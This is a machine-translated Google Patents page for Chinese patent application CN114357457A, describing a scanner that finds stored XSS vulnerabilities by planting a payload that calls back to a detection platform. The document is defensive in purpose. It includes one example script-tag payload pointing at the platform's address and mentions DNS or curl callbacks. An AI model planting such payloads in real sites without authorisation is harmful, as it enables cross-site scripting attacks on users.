CN114357457A - Vulnerability detection method and device, electronic equipment and storage medium - Google Patents
Vulnerability detection method and device, electronic equipment and storage medium Download PDFInfo
- Publication number
- CN114357457A CN114357457A CN202111576762.2A CN202111576762A CN114357457A CN 114357457 A CN114357457 A CN 114357457A CN 202111576762 A CN202111576762 A CN 202111576762A CN 114357457 A CN114357457 A CN 114357457A
- Authority
- CN
- China
- Prior art keywords
- application
- vulnerability
- target
- attack program
- vulnerability detection
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Abstract
The application provides a vulnerability detection method, a vulnerability detection device, electronic equipment and a storage medium, which relate to the technical field of network security, and the method comprises the following steps: inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform; if response content returned by the server is obtained through the vulnerability detection application, analyzing the response content, and determining a trigger page of the attack program in the target application; crawling a trigger page and executing an attack program through a vulnerability detection application to send first execution information of the attack program to a vulnerability detection platform; and receiving alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determining that the target vulnerability exists in the target application according to the alarm information. According to the technical scheme, the detection capability of the vulnerability detection application on the target vulnerability can be improved, and the detection rate of the target vulnerability is improved.
Description
Technical Field
The present application relates to the field of network security technologies, and in particular, to a vulnerability detection method and apparatus, an electronic device, and a storage medium.
Background
The Web (World Wide Web, global Wide area network) application vulnerability scanner detection technology is a very hot topic in the security industry. A Web application vulnerability scanner may detect Cross Site scripting Attack (XSS) vulnerabilities.
The XSS vulnerability is the most common Web application security vulnerability, and the essential reason for the XSS vulnerability is that the Web application does not effectively filter data input by a user, so that after an attacker embeds malicious script codes into a page which can be accessed by a normal user, when the normal user accesses the page, the embedded malicious script codes can be executed, and a series of hazards are caused to the normal user, such as stealing of Cookies of the user, phishing, session hijacking and the like.
XSS vulnerabilities include storage-type XSS vulnerabilities, which are serious and difficult to detect. The storage type XSS vulnerability can store the malicious script codes submitted by an attacker in the Web application server, and when a user accesses a page containing the malicious codes, the execution of the malicious script codes can be triggered, so that the attack purpose is achieved.
The existing Web application vulnerability scanner has the problems of weak detection capability on a storage type XSS vulnerability and low detection rate.
Disclosure of Invention
The embodiment of the disclosure provides a vulnerability detection method, a vulnerability detection device, electronic equipment and a storage medium, which are used for improving the detection capability of a Web application vulnerability scanner on a storage type XSS vulnerability and improving the detection rate of the storage type XSS vulnerability.
In order to achieve the above purpose, the technical solution of the embodiment of the present application is implemented as follows:
in a first aspect, an embodiment of the present application provides a vulnerability detection method, including:
inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
if response content returned by the server is obtained through the vulnerability detection application, analyzing the response content, and determining a trigger page of the attack program in the target application;
crawling the trigger page and executing the attack program through the vulnerability detection application to send first execution information of the attack program to the vulnerability detection platform;
and receiving alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determining that the target vulnerability exists in the target application according to the alarm information.
In an optional embodiment, the inputting, by the vulnerability detection application, the attacker of the target vulnerability into the target application includes:
inputting the content input position of the target page of the target application by the attack program of the target vulnerability through the vulnerability detection application; or
Inputting an attack program of the target vulnerability into an external link position in a page tag corresponding to a target page of the target application through the vulnerability detection application; or
And inputting the attack program of the target vulnerability into the specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
In an optional embodiment, the parsing the response content and determining the trigger page of the attack program in the target application includes:
analyzing the response content, and determining a trigger page of the attack program in the target application according to the analyzed page address information; or
And analyzing the response content, and determining an input page of the attack program in the target application as the trigger page according to the analyzed attack program.
In an optional embodiment, the method further comprises:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by a second terminal device.
In an optional embodiment, the method further comprises:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
In a second aspect, an embodiment of the present application provides a vulnerability detection method, which is applied to a vulnerability detection platform, and includes:
if first execution information of an attack program sent by a first terminal device through a vulnerability detection application is received, generating alarm information of the attack program; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in the target application through the vulnerability detection application, wherein the attack program comprises access address information of a vulnerability detection platform;
and sending the alarm information of the attack program to the vulnerability detection application of the first terminal equipment so that the vulnerability detection application determines that the target vulnerability exists in the target application.
In an optional embodiment, the sending, by the attack program, identification information to a vulnerability detection application of the terminal device based on first execution information of the attack program includes:
acquiring identification information of the attack program from first execution information of the attack program;
and after the identification information is verified, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment.
In an optional embodiment, the method further comprises:
if second execution information of the attack program sent by second terminal equipment is received, generating alarm information of the attack program; and sending second execution information of the attack program after the second terminal equipment triggers the attack program in the target application.
In a third aspect, an embodiment of the present application provides a vulnerability detection apparatus, which is applied to a first terminal device, and includes:
the system comprises an input module, a target application and a server, wherein the input module is used for inputting an attack program of a target vulnerability into the target application through a vulnerability detection application and sending the attack program to the corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
the determining module is used for analyzing the response content if the response content returned by the server is obtained through the vulnerability detection application, and determining a trigger page of the attack program in the target application;
the trigger module is used for crawling the trigger page and executing the attack program through the vulnerability detection application so as to send first execution information of the attack program to the vulnerability detection platform;
and the detection module is used for receiving the alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application and determining that the target vulnerability exists in the target application according to the alarm information.
In an alternative embodiment, the input module is further configured to:
inputting the content input position of the target page of the target application by the attack program of the target vulnerability through the vulnerability detection application; or
Inputting an attack program of the target vulnerability into an external link position in a page tag corresponding to a target page of the target application through the vulnerability detection application; or
And inputting the attack program of the target vulnerability into the specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
In an optional embodiment, the determining module is further configured to:
analyzing the response content, and determining a trigger page of the attack program according to the analyzed page address information; or
And analyzing the response content, and determining the input page of the attack program as the trigger page according to the analyzed attack program.
In an optional embodiment, the apparatus further includes a vulnerability determining module, configured to:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by second terminal equipment.
In an optional embodiment, the apparatus further includes a non-vulnerability determination module, configured to:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
In a fourth aspect, an embodiment of the present application provides a vulnerability detection apparatus, which is applied to a vulnerability detection platform, and includes:
the system comprises a receiving module, a processing module and a processing module, wherein the receiving module is used for generating alarm information of an attack program if first execution information of the attack program sent by a first terminal device through a vulnerability detection application is received; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in the target application through the vulnerability detection application, wherein the attack program comprises access address information of a vulnerability detection platform;
and the alarm sending module is used for sending alarm information to the vulnerability detection application of the first terminal equipment so that the vulnerability detection application determines that the target vulnerability exists in the target application.
In an optional embodiment, the attack program includes identification information, and the alert sending module is further configured to:
acquiring identification information of the attack program from first execution information of the attack program;
and after the identification information is verified, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment.
In an optional embodiment, the apparatus further comprises a second receiving module, configured to:
if second execution information of the attack program sent by second terminal equipment is received, generating alarm information of the attack program; and sending second execution information of the attack program after the second terminal equipment triggers the attack program in the target application.
In a fifth aspect, an embodiment of the present application further provides an electronic device, including a memory and a processor, where the memory stores a computer program that is executable on the processor, and when the computer program is executed by the processor, the processor is enabled to implement any one of the vulnerability detection methods of the first aspect and the second aspect.
In a sixth aspect, an embodiment of the present application further provides a computer-readable storage medium, where a computer program is stored in the computer-readable storage medium, and when the computer program is executed by a processor, the method for vulnerability detection according to any of the first and second aspects is implemented.
The technical scheme provided by the embodiment of the application at least has the following beneficial effects:
inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; after response content returned by the server is obtained through the vulnerability detection application, a trigger page of the attack program in the target application can be analyzed from the response content; further, the vulnerability detection application crawls the trigger page and executes the attack program to send first execution information of the attack program to the vulnerability detection platform, so that the vulnerability detection platform sends alarm information of the attack program to the vulnerability detection application after determining that the attack program is successfully executed according to the first execution information of the attack program, and then determines that the target application has the target vulnerability after receiving the alarm information of the attack program returned by the vulnerability detection platform.
In this way, by specifying the access address information of the vulnerability detection platform in the attack program and inserting the attack program into the target application, when the attack program is executed in the target application, the first execution information of the attack program can be sent to the vulnerability detection platform based on the access address information, and when the vulnerability detection platform receives the first execution information of the attack program, the attack program inserted into the target application can be proved to be executed, namely, the server of the target application has the target vulnerability; the target application can be Web application, the target vulnerability can be storage type XSS vulnerability, and correspondingly, the attack program can be an attack program aiming at the storage type XSS vulnerability.
Drawings
In order to more clearly illustrate the technical solutions in the embodiments of the present application, the drawings needed to be used in the description of the embodiments will be briefly introduced below, and it is obvious that the drawings in the following description are only some embodiments of the present application, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without inventive exercise.
Fig. 1 is a schematic view of an application scenario of a vulnerability detection method according to an embodiment of the present application;
fig. 2 is a flowchart of a vulnerability detection method provided in an embodiment of the present application;
fig. 3 is a flowchart of another vulnerability detection method provided in the present embodiment;
fig. 4 is a logic diagram of a vulnerability detection method according to an embodiment of the present application;
fig. 5 is a schematic structural diagram of a vulnerability detection apparatus according to an embodiment of the present application;
fig. 6 is a schematic structural diagram of another vulnerability detection apparatus provided in the embodiment of the present application;
fig. 7 is a schematic structural diagram of an electronic device according to an embodiment of the present application;
fig. 8 is a schematic structural diagram of another electronic device according to an embodiment of the present application.
Detailed Description
In order to make the objects, technical solutions and advantages of the present application clearer, the present application will be described in further detail with reference to the accompanying drawings, and it is obvious that the described embodiments are only a part of the embodiments of the present application, and not all embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present application.
The application comprises the following steps: an application program refers to a computer program installed on a terminal device and capable of completing one or more services, and generally needs to be operated in cooperation with a server. The target application in the embodiments of the present disclosure may be a Web application, i.e., an application program accessed through the Web.
Storage XSS: the storage type XSS stores the malicious script codes submitted by an attacker in a Web application server side, and when a user accesses a page containing the malicious codes, the code execution is triggered, so that the attack purpose is achieved. The method is different from the characteristic that the code written by the reflection-type XSS can only be attacked once, and once the malicious script of the storage-type XSS is stored in a server, the malicious script can be used for many times, and the method is also called as the permanent XSS.
WebKit: the browser is an open source browser engine, is a core part of a browser, is also called a browser kernel, and is responsible for interpreting a webpage syntax and rendering a webpage, for example, the webpage syntax includes HTML (HyperText Markup Language) and JavaScript.
Web crawlers: a web crawler is a program or script that scans or "crawls" web pages according to certain logic. The workflow generally requests to access a set initial URL (Uniform Resource Locator) to obtain the content of the response, extracts the required information and the URL from the content of the response, and then repeats the previous work based on the newly extracted URL. The vulnerability scanning application in the embodiment of the application can use a web crawler based on a WebKit engine, so that the web crawler can execute a web script (e.g., JavaScript) and render a web page, so as to present the web page in a target application (e.g., a browser), and further extract a URL in the web page.
Payload (attack load): the malicious script code submitted to the Web application server may be denoted as Payload.
Blind beating technology: when detecting whether a server has a bug, it is a common practice to send a specific Payload request to the server, and determine the response state and content of the server to identify whether the bug exists, which is intuitive and echoed. For other special scenes, the server cannot immediately display or not display (namely, any request is sent to the server, and the server returns the same state code and response message), at the moment, whether the loophole exists or not cannot be judged directly through the response state, and for loophole detection application, like a blind person, the blind person cannot be directly observed by eyes, but can be judged through other senses.
For example, an attempt may be made to have a server (or browser) with a vulnerability execute such a Payload: initiating a DNS (Domain Name Server) query request, monitoring at an NS (Domain Name Server) Server of the Domain Name, if the NS Server really receives the resolution request at the moment, indirectly judging that Payload is executed, namely indicating that a bug exists, otherwise, if the resolution request is not received, indicating that the bug does not exist or the network is not accessible and the like. In addition to initiating the DNS query request, a CURL (command line Uniform Resource Locator, a file transfer tool that works under a command line using URL syntax) request, an ICMP (Internet Control Message Protocol) request, or the like may be initiated. In short, as long as the server with the vulnerability can make some captured "actions" and the server without the vulnerability does not make the "actions", whether the vulnerability exists can be determined, which is the idea of the touch typing technology.
The word "exemplary" is used hereinafter to mean "serving as an example, embodiment, or illustration. Any embodiment described as "exemplary" is not necessarily to be construed as preferred or advantageous over other embodiments.
The terms "first" and "second" are used herein for descriptive purposes only and are not to be construed as indicating or implying relative importance or implicitly indicating the number of technical features indicated. Thus, a feature defined as "first" or "second" may explicitly or implicitly include one or more of that feature, and in the description of embodiments of the application, unless stated otherwise, "plurality" means two or more.
The following explains the design concept of the embodiments of the present application.
The storage type XSS vulnerability is seriously damaged and difficult to detect, malicious script codes submitted by an attacker can be stored in a Web application server, and the execution of the malicious script codes can be triggered whenever a user accesses a page containing the malicious codes, so that the purpose of attack is achieved. However, the existing Web application vulnerability scanner has a weak detection capability for the storage type XSS vulnerability and has a low detection rate.
In view of this, the present application provides a vulnerability detection method, apparatus, electronic device, and storage medium, where access address information of a vulnerability detection platform is specified in an attack program of a storage-type XSS vulnerability, and the attack program is inserted into a Web application, when the attack program is executed in the Web application, first execution information of the attack program may be sent to the vulnerability detection platform based on the access address information, and when the vulnerability detection platform receives the first execution information of the attack program, it may be verified that the attack program inserted into the Web application is executed, that is, a server of the Web application has the storage-type XSS vulnerability; therefore, the method and the device can improve the detection capability of the Web application vulnerability detection application on the storage type XSS vulnerability and improve the detection rate of the storage type XSS vulnerability.
An application scenario of the embodiment of the present application is exemplarily described below with reference to the drawings.
As shown in fig. 1, the application scenario of the vulnerability detection method includes a plurality of terminal devices 110, a server 120, and a vulnerability detection platform 130, and in fig. 1, three terminal devices 110 are taken as an example, and the number of terminal devices 110 is not limited in practice.
The terminal device 110 includes, but is not limited to, a tablet computer, a notebook computer, a desktop computer, an intelligent appliance, and the like; the terminal device 110 may have installed therein a target application and a vulnerability detection application, for example, the target application may be a browser-type application, an information-type application, a shopping-type application, or a social-type application. The server 120 may be a background server corresponding to the target application, and the vulnerability detection platform 130 may also be a background server corresponding to the vulnerability detection application; the server 120 and the vulnerability detection platform 130 may each be implemented by a single server or multiple servers, and may also be implemented by physical servers or virtual servers.
The terminal device 110 and the server 120 may communicate with each other through a communication network, and the terminal device 110 and the vulnerability detection platform 130 may also communicate with each other through a communication network; the communication network may be a wireless network or a wired network, which is not limited in the embodiments of the present application.
In the embodiment of the application, the terminal device 110 obtains an attack program of a target vulnerability, wherein the attack program comprises access address information of a vulnerability detection platform; inputting the attack program of the target vulnerability into the target application through the vulnerability detection application, and sending the attack program to the server 120 through the target application; if response content returned by the server is obtained through the vulnerability detection application, analyzing the response content, and determining a trigger page of the attack program in the target application; crawling the trigger page and executing the attack program by the vulnerability detection application to send first execution information of the attack program to the vulnerability detection platform 130, so that the vulnerability detection platform 130 determines that the attack program is executed based on the first execution information of the attack program and sends alarm information of the attack program to the vulnerability detection application; after receiving the warning information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, the terminal device 110 may determine that the target vulnerability exists in the target application.
The application scenario in fig. 1 is only an example of an application scenario for implementing the embodiment of the present application, and the embodiment of the present application is not limited to the application scenario in fig. 1, and in fact, the embodiment of the present application may be applied to any applicable scenario.
Fig. 2 is a flowchart of a vulnerability detection method according to an embodiment of the present application, where the method may be applied to a first terminal device, such as the terminal device 110 in fig. 1. As shown in fig. 2, the vulnerability detection method may include the following steps:
s201, inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; the attack program comprises access address information of the vulnerability detection platform.
The target application may be an application installed on the first terminal device, such as a browser application, an information application, a shopping application, or a social application, and may specifically be a Web application. The vulnerability detection application can be installed on the first terminal device and used for detecting whether a security vulnerability exists in a target application on the first terminal device. The target vulnerability may be a security vulnerability to be detected, for example, a storage type XSS vulnerability; the attacker may be malicious script code (for example, JavaScript script) for a target vulnerability, and is used to attack the target application to determine whether the target vulnerability exists in the target application, and may generally be represented by Payload; the attack program comprises access address information of the vulnerability detection platform, so that when the attack program is executed, an access request can be sent to the vulnerability detection platform, and the access request comprises first execution information of the attack program; in addition, the attack program can also comprise identification information for uniquely identifying the attack program.
Illustratively, the access address information of the vulnerability detection platform is as follows: com/, the attack program may be: and < script src ═ http:// mangdatest. com/> < script >, because the attack program input into the target application is the access address information of the vulnerability detection platform, the attack program is not easy to be intercepted by the protection application, and the imperceptibility is high, so that the target vulnerability can be detected.
When detecting whether the target application has the target vulnerability, the attack program of the target vulnerability may be input into the target application, specifically, into the target page of the target application, and several optional ways of inputting the target page are described below.
In the first mode, the attack program of the target vulnerability is input into the content input position of the target page of the target application through the vulnerability detection application.
Wherein, the content input position of the target page can be a position allowing input, such as an input text box, a textarea text box, and the like; for example, the target application is a forum for posting, and the content input location for the target page may be a text box location for entering posting content.
In the second mode, the attack program of the target vulnerability is input to the external link position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
The page tag of the target page can be a script tag, the external link position can be an src link position in an src attribute in the script tag, the src attribute is used for specifying a URL (uniform resource locator) of an external script file, the src link points to the position of an external resource, and pointed content is applied to the position of the current tag in the document.
And in the third mode, inputting the attack program of the target vulnerability into the specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
The page tag may be an HTML tag, and may detect an attribute position in the HTML tag, but determine a specified attribute position, such as an on event position, and may replace the on event execution content with an attack program, or dynamically introduce an on event, and load the attack program through the on event.
It should be noted that the attack programs input at different positions of the target page may have different identification information to distinguish the attack programs at different positions.
S202, if response content returned by the server is obtained through the vulnerability detection application, the response content is analyzed, and a trigger page of the attack program in the target application is determined.
In the embodiment of the application, the vulnerability detection application can analyze response content returned by the server based on a scanning engine, the scanning engine can be a scanning engine of a Webkit kernel, and can capture content such as page address information and an attack program from the response content, wherein the page address information can be address information of a trigger page of the attack program; in addition, if the attack program is included in the response content but the page address information is not included, it can be determined that the trigger page of the attack program is the attack program input page.
Therefore, in some embodiments, the parsing the response content in S202 to determine the trigger page of the attack program in the target application may include the following two possible cases:
in the first case, after the response content is analyzed, the page address information and the content of the attack program are obtained, and the trigger page of the attack program in the target application is determined according to the analyzed page address information.
For example, after the target page of the target application inputs the attack program, the server of the target application issues the attack program in the trigger page, and the attack program needs to be executed in the trigger page.
And in the second situation, analyzing the response content to obtain the content of the attack program, and determining the input page of the attack program in the target application as the trigger page according to the analyzed content of the attack program.
For example, after the target page of the target application inputs the attack program, the server of the target application issues the attack program in the target page, and the attack program may be executed in the target page.
S203, crawling the trigger page and executing the attack program through the vulnerability detection application so as to send first execution information of the attack program to the vulnerability detection platform.
In this step, a Webkit scanning engine of the vulnerability detection application may perform web crawler, crawl the trigger page, and trigger the attack program, and because the attack program includes the access address information of the vulnerability detection platform, after the attack program is triggered, an access request may be sent to the vulnerability detection platform, where the access request includes first execution information of the attack program, for example: the contents of the attack program, the page address information on which the attack program is executed, and the like.
After receiving the first execution information of the attack program, the vulnerability detection platform can determine that the attack program is successfully executed, acquire the executed page address information of the attack program, and further send the alarm information of the attack program and the executed page address information of the attack program to the vulnerability detection application. In addition, the vulnerability detection platform can also check the identification information of the attack program so as to determine the position of inputting the attack program into the target page of the target application.
S204, receiving alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determining that the target vulnerability exists in the target application according to the alarm information.
Specifically, the alarm information of the attack program is used for representing that the attack program is successfully executed, the vulnerability detection application can determine that the target application has the target vulnerability according to the alarm information of the attack program, specifically, the target vulnerability exists at the position of the target page of the target application where the attack program is input, and a detection report of the target vulnerability can be generated.
According to the method and the device, the attack program of the target vulnerability is input into the target application by adopting a touch typing technology, so that the target application submits the attack program to the server, if the vulnerability detection application acquires the response content of the server, the trigger page of the attack program can be determined based on the response content, the vulnerability detection application can crawl the trigger page and execute the attack program, an access request is sent to the vulnerability detection platform, so that the vulnerability detection platform (which can be understood as a touch typing platform) determines that the attack program is successfully executed, and the target application is determined to have the target vulnerability.
Considering that the input page and the trigger page of the attack program of the target vulnerability may not be the same page, or the trigger pages may be multiple, and the filtering conditions of the output content by different trigger pages may be different, if it is determined only in the input page whether the response content of the server to the attack program is received, there may be a case of missed detection. In addition, the triggering of an attack program may depend on the authority of an administrator or other privileged user, such as: the method comprises the steps that a website message version function is adopted, a user needs an administrator to check after issuing a message, if a target bug exists in a message leaving position, an attack program is input in the message leaving position, and only the administrator with message checking authority can trigger the attack program after the message leaving position successfully leaves the message; if the user side only needs to judge whether the response content of the server to the attack program is received, the missed detection can be caused.
In order to avoid the missed detection caused by the above situation, on one hand, in the embodiment of the present application, after the attack program is submitted to the server of the target application, if the response content returned by the server is obtained and the trigger page of the attack program is analyzed, the vulnerability detection application crawls the trigger page and executes the attack program to send an access request to the vulnerability detection platform, so that the vulnerability detection platform determines that the attack program is successfully executed, and further determines that the target application has the target vulnerability.
On the other hand, considering that the attack program may need to be triggered in the target application on the second terminal device, the embodiment of the present application may monitor the execution condition of the attack program through the vulnerability detection application. Optionally, the embodiment of the present application may further include the following steps:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by second terminal equipment.
The server can release the attack program to the target application after the user inputs the attack program into the target application on the first terminal device, and other users can trigger the attack program through the target application on the second terminal device; the other users may be administrators of the target application, for example, to review content published in the target application, or may be ordinary users, which may publish content in the target application or browse content, and the like.
Based on the above embodiments of the present application, after submitting an attack program to a server of a target application, if response content returned by the server is obtained through a vulnerability detection application, and after triggering the attack program, a vulnerability detection platform returns alarm information of the attack program, so that it can be determined that the target application has a target vulnerability; on the contrary, if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information returned by the vulnerability detection platform is not received, it can be shown that the attack program is intercepted and the target application does not have the target vulnerability.
Therefore, in some embodiments, the present application embodiments may further include the steps of:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
The following describes an exemplary vulnerability detection method on the vulnerability detection platform side.
As shown in fig. 3, an embodiment of the present application provides a vulnerability detection method, which is applied to a vulnerability detection platform, and includes the following steps:
s301, if first execution information of the attack program sent by the first terminal device through the vulnerability detection application is received, generating alarm information of the attack program;
the first execution information of the attack program is sent after the first terminal device triggers the attack program of the target vulnerability in the target application through the vulnerability detection application, and the attack program comprises access address information of the vulnerability detection platform.
S302, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment so that the vulnerability detection application can determine that the target vulnerability exists in the target application.
In some embodiments, the method includes, in the attack program, sending, based on first execution information of the attack program, alarm information of the attack program to a vulnerability detection application of the terminal device, where the sending includes:
acquiring identification information of the attack program from first execution information of the attack program;
and after the identification information is verified, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment.
The attack programs input to different positions of the target application have different identification information, and the input position of the attack program in the target application can be determined by verifying the identification information of the attack program, so that whether a target vulnerability exists in the corresponding input position of the target application is determined.
In some embodiments, the method further comprises the steps of:
if second execution information of the attack program sent by the second terminal device is received, generating alarm information of the attack program; and the second execution information of the attack program is sent after the second terminal equipment triggers the attack program in the target application.
Further, the trigger page address information of the attack program in the second execution information may be obtained, and the trigger page address information is sent to the vulnerability detection application of the first terminal device, so that the vulnerability detection application generates a detection report of the target vulnerability.
The vulnerability detection method according to the embodiment of the present application is exemplarily described below with reference to fig. 4.
As shown in fig. 4, taking a target vulnerability to be detected as a storage-type XSS vulnerability and a target application as a Web application as an example, when detecting whether the Web application has the storage-type XSS vulnerability, the vulnerability detection process is as follows:
(1) and implanting payload in the Web application to submit the payload to a server of the Web application.
In the first implantation manner, the vulnerability detection application may implant a payload, which is an attack program in the above embodiment of the present application, in a position where input is allowed, such as an input text box and a textarea text box of the Web application, where the payload includes the touch address information of the touch platform, and the touch platform may be understood as being higher in the above embodiment of the present application, so that the vulnerability detection rate may be improved.
In the second implantation mode, the vulnerability detection application can replace the src link at the position where the src attribute of the page tag script of the Web application is controllable, and introduce payload.
In a third implantation mode, the vulnerability detection application can also detect the attribute position in the HTML tag of the Web application, replace the on event execution content or dynamically introduce the on event, and load payload through the on event.
(2) After the Payload is implanted, a scanning engine of a Webkit kernel of the vulnerability detection application analyzes response content of a server of the Web application, captures contents such as URL (uniform resource locator) and Payload of a returned trigger page, actively triggers the Payload by virtually loading the trigger page through the Webkit, and then completes a first part: a Webkit crawler triggered touch typing process.
(3) Some Payload needs to be triggered passively by other users due to position hiding or insufficient execution authority, the process needs a certain time period, the touch printing platform can continuously monitor, and once a request for successful execution of the touch printing Payload is received, an alarm is sent immediately to inform the vulnerability detection application to generate a scanning report. This process completes the second part: the natural environment triggers the process.
(4) The above two touch printing technologies (2) and (3) both need to rely on a touch printing platform, the touch printing platform can monitor whether the touch printing payload is successfully executed and give an alarm to inform a bug scanning product, and also undertake the functions of automatic deduplication of the touch printing payload, payload management and the like, and under a certain scene, the permission persistence maintenance can be performed on users of bug detection application, and the problems that the users cannot reappear after receiving the alarm are avoided.
In the embodiment of the application, a touch typing payload is submitted to a server of a Web application, a Webkit engine crawler is used for actively crawling relevant pages, the payload is triggered to be executed, and then a log is analyzed on a touch typing platform to prove the existence of a storage type XSS vulnerability.
By combining the touch typing technology with Webkit virtual execution of vulnerability detection application and adopting the touch typing technology to implant script links (touch typing platform address information) capable of being analyzed by the Webkit, the script links can be virtually executed by the Webkit of vulnerability detection application and can be actively triggered by normal users. The vulnerability detection application can detect a relatively direct XSS vulnerability stored in a virtual execution mode after scanning, and some payload needing to be triggered by a user with a certain authority or hidden in position need to be triggered by other users for supplement. The common user is made to be the main body of vulnerability detection, and the advantages of the touch typing technology are fully played. The blind typing payload execution main body in the embodiment of the application is a vulnerability detection application and a common user, and by expanding the blind typing payload execution main body, the vulnerability detection effect can be improved, and the problem of low vulnerability detection rate of the storage type XSS is solved.
Based on the same inventive concept as the above method embodiment of the present application, the embodiment of the present application further provides a vulnerability detection apparatus, and the principle of the apparatus for solving the problem is similar to the method of the above embodiment, so the implementation of the apparatus can refer to the implementation of the above method, and repeated details are not repeated.
As shown in fig. 5, an embodiment of the present application provides a vulnerability detection apparatus, which is applied to a first terminal device, where the vulnerability detection apparatus 50 includes:
the input module 51 is used for inputting the attack program of the target vulnerability into the target application through the vulnerability detection application and sending the attack program to the corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
the determining module 52 is configured to, if the response content returned by the server is obtained through the vulnerability detection application, analyze the response content, and determine a trigger page of the attack program in the target application;
the trigger module 53 is configured to crawl a trigger page and execute an attack program through a vulnerability detection application, so as to send first execution information of the attack program to a vulnerability detection platform;
and the detection module 54 is configured to receive alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determine that the target vulnerability exists in the target application according to the alarm information.
In an alternative embodiment, the input module is further configured to:
inputting the content input position of a target page of a target application by an attack program of a target vulnerability through a vulnerability detection application; or
Inputting an attack program of a target vulnerability into an external link position in a page tag corresponding to a target page of the target application through the vulnerability detection application; or
And inputting the attack program of the target vulnerability into the specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
In an alternative embodiment, the determining module is further configured to:
analyzing the response content, and determining a trigger page of the attack program according to the analyzed page address information; or
And analyzing the response content, and determining the input page of the attack program as a trigger page according to the analyzed attack program.
In an optional embodiment, the apparatus further comprises a vulnerability determining module, configured to:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by the second terminal device.
In an optional embodiment, the apparatus further comprises a non-vulnerability determination module, configured to:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
Based on the same inventive concept as the above method embodiment of the present application, the embodiment of the present application further provides a vulnerability detection apparatus, and the principle of the apparatus for solving the problem is similar to the method of the above embodiment, so the implementation of the apparatus can refer to the implementation of the above method, and repeated details are not repeated.
As shown in fig. 6, the vulnerability detection apparatus 60 provided in the embodiment of the present application is applied to a vulnerability detection platform, and includes a first receiving module 61 and an alarm sending module 62.
The first receiving module 61 is configured to generate alarm information of an attack program if first execution information of the attack program sent by the first terminal device through the vulnerability detection application is received; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in the target application through the vulnerability detection application, wherein the attack program comprises access address information of a vulnerability detection platform;
and an alarm sending module 62, configured to send alarm information to the vulnerability detection application of the first terminal device, so that the vulnerability detection application determines that the target vulnerability exists in the target application.
In an optional embodiment, the attack program includes identification information, and the alarm sending module is further configured to:
acquiring identification information of the attack program from first execution information of the attack program;
and after the identification information is verified, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment.
In an optional embodiment, the apparatus further comprises a second receiving module, configured to:
if second execution information of the attack program sent by the second terminal device is received, generating alarm information of the attack program; and the second execution information of the attack program is sent after the second terminal equipment triggers the attack program in the target application.
Further, the alarm sending module 62 may further obtain the address information of the trigger page of the attack program in the second execution information, and send the address information of the trigger page to the vulnerability detection application of the first terminal device.
After introducing a vulnerability detection method and apparatus of an exemplary embodiment of the present application, an electronic device according to another exemplary embodiment of the present application is introduced next.
An embodiment of the present application provides an electronic device 700, shown in fig. 7, including: memory 720 and processor 710:
the memory 720 is used to store computer programs that may be run on the processor;
the processor 710 is configured to execute a computer program to implement any of the vulnerability detection methods in the above embodiments.
In some possible implementations, an electronic device according to the present application may include at least one processor, and at least one memory. Wherein the memory stores program code which, when executed by the processor, causes the processor to perform the steps of the animation effect detection method according to various exemplary embodiments of the present application described above in the present specification. For example, the processor may perform the steps shown in fig. 2 or fig. 3.
